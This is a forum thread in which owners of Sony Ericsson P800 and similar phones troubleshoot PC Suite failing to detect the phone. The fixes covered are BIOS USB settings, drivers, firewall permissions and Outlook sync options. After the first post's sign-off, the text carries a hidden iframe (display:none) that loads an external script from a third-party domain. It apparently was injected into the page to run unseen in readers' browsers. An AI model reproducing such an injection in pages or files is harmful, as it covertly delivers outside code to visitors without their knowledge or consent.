Just got a new P800 - finally. LOVE IT!! Works great! Except.... I can't get the PC Suite software to recognize that there is a phone attached. My computer sees it (via the USB cradle or IR), but I keep getting an error that no phone is connected. I have tried everything. can anyone please help me fix this????
thank you so much,<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Well, I solved the problem...FINALLY! I had to send it in & get a new replacement phone directly from Sony. It turns out it was the internal software - mine had an older version & it just wouldn't synch w/ my computer. the new one works great. I've synched all my Outlook info. it is awesome. Finally, a phone that can replace my iPaq. It does ALMOST everything I needed my iPaq for - Calendar, Contacts, Tasks, Notes, internet (very cool w/ the Opera browser!), email, phone calls, views pics & docs & Mpgs.
Re: PC Suite won't recognize phone connection - HELP!
I have the same problem, except my computer does not "see the phone".
What do you mean "My computer sees it"?
When I plug in USB cable, my computer does nothing. I haven't used USB port before. How can I be sure, that USB port works properly?
Does under "Link properties" in the computer have to be visible USB port, too?
Does the phone recognize automatically if the connection has been established or do I set my phone up somehow before?

Do they replace my phone, if I bought it from unknown person? Did you have to show your warranty papers to get fixed phone?
1) Is the PC Suite installed on your PC? (I'll assume it is)
2)You should have a black line in your taskbar(near your clock, speaker icons) double left-click on the line and a box will come up with connection options (USB, unknown, cable, Infrared) make sure USB is ticked.
3)If your PC 'sees' your p800 a little pic of the p800 will appear in the taskbar
4)On the p800 Control Panel > Connections tab > Cable > Cable status = PC connect, baud rate = 460800, parity = none, stopbits = 1, character length = 8, flow control = CTS/RTS
Re: PC Suite won't recognize phone connection - HELP!
That's the problem - there is no USB connection under Link properties. Only Cable (COM1, COM2) and Infrared what I can't select.
Does your Windows 2000 recognize your new USB connection even without
putting P800 in the cradle?
I want to know, is the problem with the phone or PC (Windows)
Win2000 - hmm, I'm on Millenium and I've read about somebody else with W2k (SP3) who can't even install the PC Suite..!
When I click on my 'Link Wire' in the task bar it shows the 4 connection types I quoted earlier (IR, USB...)
If you right-click on 'my computer' and choose 'properties', the Device Manager should show USB DCU-11 as an extra USB port.
***FORGOT***
Have you got ZoneAlarm or something similar installed on your PC?
If you have you need to allow access to about 6 different programs to connect to your p800!
So seems that my PC doesn't function properly because I can't find any USB under Device Manager (see the attachment). Could anyone help me with USB port? Its on mainboard.
Do I have to buy something additional for PC for using bluetooth connection?
Thanks for Your time!
I did install even PC Suite 1.1.1 without problems, too. Using Pc-Cillin - since now it haven't disturb me anytime. USB port or connection is not establised even without closing and killing its prgrams under task manager process.
For motherboard support, go to the manufacturer's website and check for driver updates - also make sure you are up-to-date on windows update site.
Also - the PC suite is now 1.4.2 http://www.sonyericsson.com/spg.jsp?page=gsapopup&Redir=template%3DSP1_17_1%26B%3Die%26PID%3D9940%26LM%3DSD_V%26FID%3D3336
Well, my actual problem was already in BIOS:
"On Chip USB" was disabled under "Integrated Peripherals".
The next problem was with driver. Windows did not detect automatically driver for USB device, and it took for me a long time to undestand, that I have to show the file suscom.inf from PC Suite CD.
Installed MS Outlook 2000 and selected all data in data sync station.
Then I could sync calendar, but in the middle of syncronisation comes an error:
"Folder/section cannot be found"
Nothing but calendar was syncronised.
The problem was in the Sync station settings.
I was left for adress book another choice:
Windows Adress Book - Contacts
Changing it to MS Otlook ... fixed the problem. No more errors but email still wasn't synced
Again was the problem in the Sync station settings.
By default there was 1 day old messages but my messages were older.
I'd wish that e-mail sync could copy from PC my own made folders, too
I had this problem, which came out of the blue after working brilliantly, with my previous p900 and now with myk700.
Basically in layman's terms, how do i get it to recognize the phone. The software was loaded up with no problems but my pc just doesnt see the phone but does recognize a usb connect has been made.
